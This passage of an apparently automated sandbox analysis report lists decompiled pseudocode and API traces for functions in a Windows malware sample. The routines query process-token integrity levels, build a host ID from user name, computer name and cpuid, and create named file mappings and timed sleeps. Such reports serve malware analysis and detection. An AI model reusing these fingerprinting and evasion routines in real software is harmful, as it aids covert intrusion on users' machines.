                                                          							 *((char*)(_t34 + _t42)) = 0;
                                                          							__imp__(_t30, _v8);
                                                          						}
                                                          						 *_a8 = _t34;
                                                          						_t37 = 1;
                                                          						 *_a12 = _t30;
                                                          					}
                                                          				}
                                                          				return _t37;
                                                          			}















                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,04C03E08,?,?,?,?,00000102,04C067B8,?,?,00000000), ref: 04C05AFD
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
                                                            • Part of subcall function 04C0A782: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04C05B2B,00000000,00000001,00000001,?,?,04C03E08,?,?,?,?,00000102), ref: 04C0A790
                                                            • Part of subcall function 04C0A782: StrChrA.SHLWAPI(?,0000003F,?,?,04C03E08,?,?,?,?,00000102,04C067B8,?,?,00000000,00000000), ref: 04C0A79A
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04C03E08,?,?,?,?,00000102,04C067B8,?), ref: 04C05B5B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04C05B6B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04C05B77
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04C045C6(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                          				void* _v8;
                                                          				void* _t18;
                                                          				int _t25;
                                                          				int _t29;
                                                          				int _t34;
                                                          
                                                          				_t29 = lstrlenW(_a4);
                                                          				_t25 = lstrlenW(_a8);
                                                          				_t18 = E04C0A71F(_t25 + _t29 + _t25 + _t29 + 2);
                                                          				_v8 = _t18;
                                                          				if(_t18 != 0) {
                                                          					_t34 = _t29 + _t29;
                                                          					memcpy(_t18, _a4, _t34);
                                                          					_t10 = _t25 + 2; // 0x2
                                                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                          				}
                                                          				return _v8;
                                                          			}









                                                          APIs
                                                          • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,0688935C,?,04C08D93,004F0053,0688935C,?,?,?,?,?,?,04C0523E), ref: 04C045D6
                                                          • lstrlenW.KERNEL32(04C08D93,?,04C08D93,004F0053,0688935C,?,?,?,?,?,?,04C0523E), ref: 04C045DD
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
                                                          • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,04C08D93,004F0053,0688935C,?,?,?,?,?,?,04C0523E), ref: 04C045FD
                                                          • memcpy.NTDLL(74B069A0,04C08D93,00000002,00000000,004F0053,74B069A0,?,?,04C08D93,004F0053,0688935C), ref: 04C04610
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2411391700-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(06889A78,00000000,00000000,7742C740,04C020ED,00000000), ref: 04C0362A
                                                          • lstrlen.KERNEL32(?), ref: 04C03632
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
                                                          • lstrcpy.KERNEL32(00000000,06889A78), ref: 04C03646
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04C03651
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          C-Code - Quality: 38%
                                                          			E04635A27(char _a4, void* _a8) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				char _v16;
                                                          				void* _v20;
                                                          				char _v24;
                                                          				char _v28;
                                                          				char _v32;
                                                          				char _v36;
                                                          				char _v40;
                                                          				void* _v44;
                                                          				void** _t33;
                                                          				void* _t40;
                                                          				void* _t43;
                                                          				void** _t44;
                                                          				intOrPtr* _t47;
                                                          				char _t48;
                                                          
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v20 = _a4;
                                                          				_t48 = 0;
                                                          				_v16 = 0;
                                                          				_a4 = 0;
                                                          				_v44 = 0x18;
                                                          				_v40 = 0;
                                                          				_v32 = 0;
                                                          				_v36 = 0;
                                                          				_v28 = 0;
                                                          				_v24 = 0;
                                                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                          					_t33 =  &_v8;
                                                          					__imp__(_v12, 8, _t33);
                                                          					if(_t33 >= 0) {
                                                          						_t47 = __imp__;
                                                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                          						_t44 = E0463A71F(_a4);
                                                          						if(_t44 != 0) {
                                                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                          							if(_t40 >= 0) {
                                                          								memcpy(_a8,  *_t44, 0x1c);
                                                          								_t48 = 1;
                                                          							}
                                                          							E0463A734(_t44);
                                                          						}
                                                          						NtClose(_v8); // executed
                                                          					}
                                                          					NtClose(_v12);
                                                          				}
                                                          				return _t48;
                                                          			}




















                                                          APIs
                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04635A6E
                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04635A81
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04635A9D
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04635ABA
                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04635AC7
                                                          • NtClose.NTDLL(?), ref: 04635AD9
                                                          • NtClose.NTDLL(00000000), ref: 04635AE3
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: 0c0770be73e892d5a0957d360dc22ac9692808c57dc7e84100e7e2bb39298bf5
                                                          • Instruction ID: 5937c8a7995d4d55446a2b503082ef7139b486fbb3c84c4323af41d4bce62868
                                                          • Opcode Fuzzy Hash: 0c0770be73e892d5a0957d360dc22ac9692808c57dc7e84100e7e2bb39298bf5
                                                          • Instruction Fuzzy Hash: 44211672900258BBDB01AFA5CC84ADEBFBDEF08741F105026F902F6110E7769A44ABA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 83%
                                                          			E046351B0(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                          				struct %anon52 _v8;
                                                          				long _v12;
                                                          				char _v16;
                                                          				char _v20;
                                                          				signed int _v24;
                                                          				intOrPtr _v32;
                                                          				union _LARGE_INTEGER _v36;
                                                          				intOrPtr _v40;
                                                          				void* _v44;
                                                          				void _v88;
                                                          				char _v92;
                                                          				struct %anon52 _t46;
                                                          				intOrPtr _t51;
                                                          				long _t53;
                                                          				void* _t54;
                                                          				struct %anon52 _t60;
                                                          				long _t64;
                                                          				signed int _t65;
                                                          				void* _t68;
                                                          				void* _t70;
                                                          				signed int _t71;
                                                          				intOrPtr _t73;
                                                          				intOrPtr _t76;
                                                          				void** _t78;
                                                          				void* _t80;
                                                          
                                                          				_t73 = __edx;
                                                          				_v92 = 0;
                                                          				memset( &_v88, 0, 0x2c);
                                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                          				_v44 = _t46;
                                                          				if(_t46 == 0) {
                                                          					_v8.LowPart = GetLastError();
                                                          				} else {
                                                          					_push(0xffffffff);
                                                          					_push(0xff676980);
                                                          					_push(0);
                                                          					_push( *0x463d240);
                                                          					_v20 = 0;
                                                          					_v16 = 0;
                                                          					L0463AF2E();
                                                          					_v36.LowPart = _t46;
                                                          					_v32 = _t73;
                                                          					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                          					_t51 =  *0x463d26c; // 0x324
                                                          					_v40 = _t51;
                                                          					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                          					_v8.LowPart = _t53;
                                                          					if(_t53 == 0) {
                                                          						if(_a8 != 0) {
                                                          							L4:
                                                          							 *0x463d24c = 5;
                                                          						} else {
                                                          							_t68 = E04638D14(_t73); // executed
                                                          							if(_t68 != 0) {
                                                          								goto L4;
                                                          							}
                                                          						}
                                                          						_v12 = 0;
                                                          						L6:
                                                          						L6:
                                                          						if(_v12 == 1 && ( *0x463d260 & 0x00000001) == 0) {
                                                          							_v12 = 2;
                                                          						}
                                                          						_t71 = _v12;
                                                          						_t58 = _t71 << 4;
                                                          						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                          						_t72 = _t71 + 1;
                                                          						_v24 = _t71 + 1;
                                                          						_t60 = E0463A376(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
                                                          						_v8.LowPart = _t60;
                                                          						if(_t60 != 0) {
                                                          							goto L17;
                                                          						}
                                                          						_t65 = _v24;
                                                          						_v12 = _t65;
                                                          						_t90 = _t65 - 3;
                                                          						if(_t65 != 3) {
                                                          							goto L6;
                                                          						} else {
                                                          							_v8.LowPart = E046336B1(_t72, _t90,  &_v92, _a4, _a8);
                                                          						}
                                                          						goto L12;
                                                          						L17:
                                                          						__eflags = _t60 - 0x10d2;
                                                          						if(_t60 != 0x10d2) {
                                                          							_push(0xffffffff);
                                                          							_push(0xff676980);
                                                          							_push(0);
                                                          							_push( *0x463d244);
                                                          							goto L21;
                                                          						} else {
                                                          							__eflags =  *0x463d248; // 0x0
                                                          							if(__eflags == 0) {
                                                          								goto L12;
                                                          							} else {
                                                          								_t60 = E04636761();
                                                          								_push(0xffffffff);
                                                          								_push(0xdc3cba00);
                                                          								_push(0);
                                                          								_push( *0x463d248);
                                                          								L21:
                                                          								L0463AF2E();
                                                          								_v36.LowPart = _t60;
                                                          								_v32 = _t76;
                                                          								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                          								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                          								_v8.LowPart = _t64;
                                                          								__eflags = _t64;
                                                          								if(_t64 == 0) {
                                                          									goto L6;
                                                          								} else {
                                                          									goto L12;
                                                          								}
                                                          							}
                                                          						}
                                                          						L25:
                                                          					}
                                                          					L12:
                                                          					_t78 =  &_v92;
                                                          					_t70 = 3;
                                                          					do {
                                                          						_t54 =  *_t78;
                                                          						if(_t54 != 0) {
                                                          							HeapFree( *0x463d238, 0, _t54);
                                                          						}
                                                          						_t78 =  &(_t78[4]);
                                                          						_t70 = _t70 - 1;
                                                          					} while (_t70 != 0);
                                                          					CloseHandle(_v44);
                                                          				}
                                                          				return _v8;
                                                          				goto L25;
                                                          			}

                                                          APIs
                                                          • memset.NTDLL ref: 046351C5
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 046351D1
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 046351F6
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04635212
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0463522B
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 046352C1
                                                          • CloseHandle.KERNEL32(?), ref: 046352D0
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0463530A
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04635D5E,?), ref: 04635320
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0463532B
                                                            • Part of subcall function 04638D14: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04EC93A0,?,00000000,30314549,00000014,004F0053,04EC935C), ref: 04638E00
                                                            • Part of subcall function 04638D14: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0463523E), ref: 04638E12
                                                          • GetLastError.KERNEL32 ref: 0463533D
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                          • String ID:
                                                          • API String ID: 3521023985-0
                                                          • Opcode ID: d42cdcb9772fbdfc747a9d3795ab5fcc2a699c54c261305de21b7b1af5e1320b
                                                          • Instruction ID: 337a2f11b9f69f83c07c03d67e5e9170cb6372388c16cabb9c6c4a4421e2c047
                                                          • Opcode Fuzzy Hash: d42cdcb9772fbdfc747a9d3795ab5fcc2a699c54c261305de21b7b1af5e1320b
                                                          • Instruction Fuzzy Hash: 71514D719012A8BBDB11DF95DC44DEEBFB8EF49726F204215F911B3250E774AA44CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E0463232F(intOrPtr __edx, void** _a4, void** _a8) {
                                                          				intOrPtr _v8;
                                                          				struct _FILETIME* _v12;
                                                          				short _v56;
                                                          				struct _FILETIME* _t12;
                                                          				intOrPtr _t13;
                                                          				void* _t17;
                                                          				void* _t21;
                                                          				intOrPtr _t27;
                                                          				long _t28;
                                                          				void* _t30;
                                                          
                                                          				_t27 = __edx;
                                                          				_t12 =  &_v12;
                                                          				GetSystemTimeAsFileTime(_t12);
                                                          				_push(0x192);
                                                          				_push(0x54d38000);
                                                          				_push(_v8);
                                                          				_push(_v12);
                                                          				L0463AF28();
                                                          				_push(_t12);
                                                          				_v12 = _t12;
                                                          				_t13 =  *0x463d2a8; // 0x88a5a8
                                                          				_t5 = _t13 + 0x463e87e; // 0x4ec8e26
                                                          				_t6 = _t13 + 0x463e59c; // 0x530025
                                                          				_push(0x16);
                                                          				_push( &_v56);
                                                          				_v8 = _t27;
                                                          				L0463ABCA();
                                                          				_t17 = CreateFileMappingW(0xffffffff, 0x463d2ac, 4, 0, 0x1000,  &_v56); // executed
                                                          				_t30 = _t17;
                                                          				if(_t30 == 0) {
                                                          					_t28 = GetLastError();
                                                          				} else {
                                                          					if(GetLastError() == 0xb7) {
                                                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                          						if(_t21 == 0) {
                                                          							_t28 = GetLastError();
                                                          							if(_t28 != 0) {
                                                          								goto L6;
                                                          							}
                                                          						} else {
                                                          							 *_a4 = _t30;
                                                          							 *_a8 = _t21;
                                                          							_t28 = 0;
                                                          						}
                                                          					} else {
                                                          						_t28 = 2;
                                                          						L6:
                                                          						CloseHandle(_t30);
                                                          					}
                                                          				}
                                                          				return _t28;
                                                          			}

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04635C31,?,?,4D283A53,?,?), ref: 0463233B
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04632351
                                                          • _snwprintf.NTDLL ref: 04632376
                                                          • CreateFileMappingW.KERNELBASE(000000FF,0463D2AC,00000004,00000000,00001000,?), ref: 04632392
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04635C31,?,?,4D283A53), ref: 046323A4
                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 046323BB
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04635C31,?,?), ref: 046323DC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04635C31,?,?,4D283A53), ref: 046323E4
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: 37ab34862b0ddc60ad84c14691cecf64dabec1292da327a956a4384c92fbc9fa
                                                          • Instruction ID: d236c640ef3ca3d796b6146d246b8c4a87bef919056ffbed7cf8a857eac434d3
                                                          • Opcode Fuzzy Hash: 37ab34862b0ddc60ad84c14691cecf64dabec1292da327a956a4384c92fbc9fa
                                                          • Instruction Fuzzy Hash: E521C073600284BBE711ABA4CC45F8E37A9EB58712F100165F605E7290FB71AD058B51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 96%
                                                          			E04639135(char __eax, void* __esi) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				signed int _v28;
                                                          				long _t34;
                                                          				signed int _t39;
                                                          				long _t50;
                                                          				char _t59;
                                                          				intOrPtr _t61;
                                                          				void* _t62;
                                                          				void* _t64;
                                                          				char _t65;
                                                          				intOrPtr* _t67;
                                                          				void* _t68;
                                                          				void* _t69;
                                                          
                                                          				_t69 = __esi;
                                                          				_t65 = __eax;
                                                          				_v8 = 0;
                                                          				_v12 = __eax;
                                                          				if(__eax == 0) {
                                                          					_t59 =  *0x463d270; // 0xd448b889
                                                          					_v12 = _t59;
                                                          				}
                                                          				_t64 = _t69;
                                                          				E0463A6CC( &_v12, _t64);
                                                          				if(_t65 != 0) {
                                                          					 *_t69 =  *_t69 ^  *0x463d2a4 ^ 0x4c0ca0ae;
                                                          				} else {
                                                          					GetUserNameW(0,  &_v8); // executed
                                                          					_t50 = _v8;
                                                          					if(_t50 != 0) {
                                                          						_t62 = RtlAllocateHeap( *0x463d238, 0, _t50 + _t50);
                                                          						if(_t62 != 0) {
                                                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                          								_t64 = _t62;
                                                          								 *_t69 =  *_t69 ^ E04637306(_v8 + _v8, _t64);
                                                          							}
                                                          							HeapFree( *0x463d238, 0, _t62);
                                                          						}
                                                          					}
                                                          				}
                                                          				_t61 = __imp__;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				GetComputerNameW(0,  &_v8);
                                                          				_t34 = _v8;
                                                          				if(_t34 != 0) {
                                                          					_t68 = RtlAllocateHeap( *0x463d238, 0, _t34 + _t34);
                                                          					if(_t68 != 0) {
                                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                          							_t64 = _t68;
                                                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04637306(_v8 + _v8, _t64);
                                                          						}
                                                          						HeapFree( *0x463d238, 0, _t68);
                                                          					}
                                                          				}
                                                          				asm("cpuid");
                                                          				_t67 =  &_v28;
                                                          				 *_t67 = 1;
                                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                          				 *(_t67 + 0xc) = _t64;
                                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                          				return _t39;
                                                          			}




















                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0463916C
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04639183
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04639190
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04635D20), ref: 046391B1
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 046391D8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 046391EC
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 046391F9
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04635D20), ref: 04639217
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID:
                                                          • API String ID: 3239747167-0
                                                          • Opcode ID: eeb8df7076ebafc6751631758a900ad3c701894aec6a88402faf936660b1e9a0
                                                          • Instruction ID: f730304f0a2f75d48075b61ce48137b80674e62e2caae5bc4247a203171bd9e9
                                                          • Opcode Fuzzy Hash: eeb8df7076ebafc6751631758a900ad3c701894aec6a88402faf936660b1e9a0
                                                          • Instruction Fuzzy Hash: CE3139B2A00285EFEB10DFA8DD84AAEB7F9EF54302F114469E505E7250E774EE059F10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04631A08(long* _a4) {
                                                          				long _v8;
                                                          				void* _v12;
                                                          				void _v16;
                                                          				long _v20;
                                                          				int _t33;
                                                          				void* _t46;
                                                          
                                                          				_v16 = 1;
                                                          				_v20 = 0x2000;
                                                          				if( *0x463d25c > 5) {
                                                          					_v16 = 0;
                                                          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                          						_v8 = 0;
                                                          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                          						if(_v8 != 0) {
                                                          							_t46 = E0463A71F(_v8);
                                                          							if(_t46 != 0) {
                                                          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                          								if(_t33 != 0) {
                                                          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                          								}
                                                          								E0463A734(_t46);
                                                          							}
                                                          						}
                                                          						CloseHandle(_v12);
                                                          					}
                                                          				}
                                                          				 *_a4 = _v20;
                                                          				return _v16;
                                                          			}










                                                          APIs
                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04631A3A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04631A5A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04631A6A
                                                          • CloseHandle.KERNEL32(00000000), ref: 04631ABA
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04631A8D
                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04631A95
                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04631AA5
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                          • String ID:
                                                          • API String ID: 1295030180-0
                                                          • Opcode ID: 069fdcc087d9ed3ff5c5d0f9236138b28431a2a3872a49ecdd8cbcbe24c64e56
                                                          • Instruction ID: 95ddd23f7b4e264c6e5098cd2358b7aab0bfb2a32a5e69522d03568dbbc0dce7
                                                          • Opcode Fuzzy Hash: 069fdcc087d9ed3ff5c5d0f9236138b28431a2a3872a49ecdd8cbcbe24c64e56
                                                          • Instruction Fuzzy Hash: 69215C7590028CFFEB00DFA4DC84EEEBBB9EB09706F004165F900A6290E7759E45EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E046312E5(void* __ecx, void* __edx, intOrPtr _a4) {
                                                          				struct _FILETIME _v12;
                                                          				void* _t10;
                                                          				void* _t12;
                                                          				int _t14;
                                                          				signed int _t16;
                                                          				void* _t18;
                                                          				signed int _t19;
                                                          				unsigned int _t23;
                                                          				void* _t26;
                                                          				signed int _t33;
                                                          
                                                          				_t26 = __edx;
                                                          				_push(__ecx);
                                                          				_push(__ecx);
                                                          				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                          				 *0x463d238 = _t10;
                                                          				if(_t10 != 0) {
                                                          					 *0x463d1a8 = GetTickCount();
                                                          					_t12 = E04633E69(_a4);
                                                          					if(_t12 == 0) {
                                                          						do {
                                                          							GetSystemTimeAsFileTime( &_v12);
                                                          							_t14 = SwitchToThread();
                                                          							_t23 = _v12.dwHighDateTime;
                                                          							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                                          							_push(0);
                                                          							_push(9);
                                                          							_push(_t23 >> 7);
                                                          							_push(_t16);
                                                          							L0463B08A();
                                                          							_t33 = _t14 + _t16;
                                                          							_t18 = E04635548(_a4, _t33);
                                                          							_t19 = 2;
                                                          							_t25 = _t33;
                                                          							Sleep(_t19 << _t33); // executed
                                                          						} while (_t18 == 1);
                                                          						if(E04634DA2(_t25) != 0) {
                                                          							 *0x463d260 = 1; // executed
                                                          						}
                                                          						_t12 = E04635BA2(_t26); // executed
                                                          					}
                                                          				} else {
                                                          					_t12 = 8;
                                                          				}
                                                          				return _t12;
                                                          			}














                                                          APIs
                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04634EF2,?), ref: 046312F8
                                                          • GetTickCount.KERNEL32 ref: 0463130C
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04634EF2,?), ref: 04631328
                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,04634EF2,?), ref: 0463132E
                                                          • _aullrem.NTDLL(?,?,00000009,00000000), ref: 0463134B
                                                          • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,04634EF2,?), ref: 04631365
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                          • String ID:
                                                          • API String ID: 507476733-0
                                                          • Opcode ID: 093feacedc84cd86e627b2b8ed986ac2961040a725ee3d9e00591a73ddc7e891
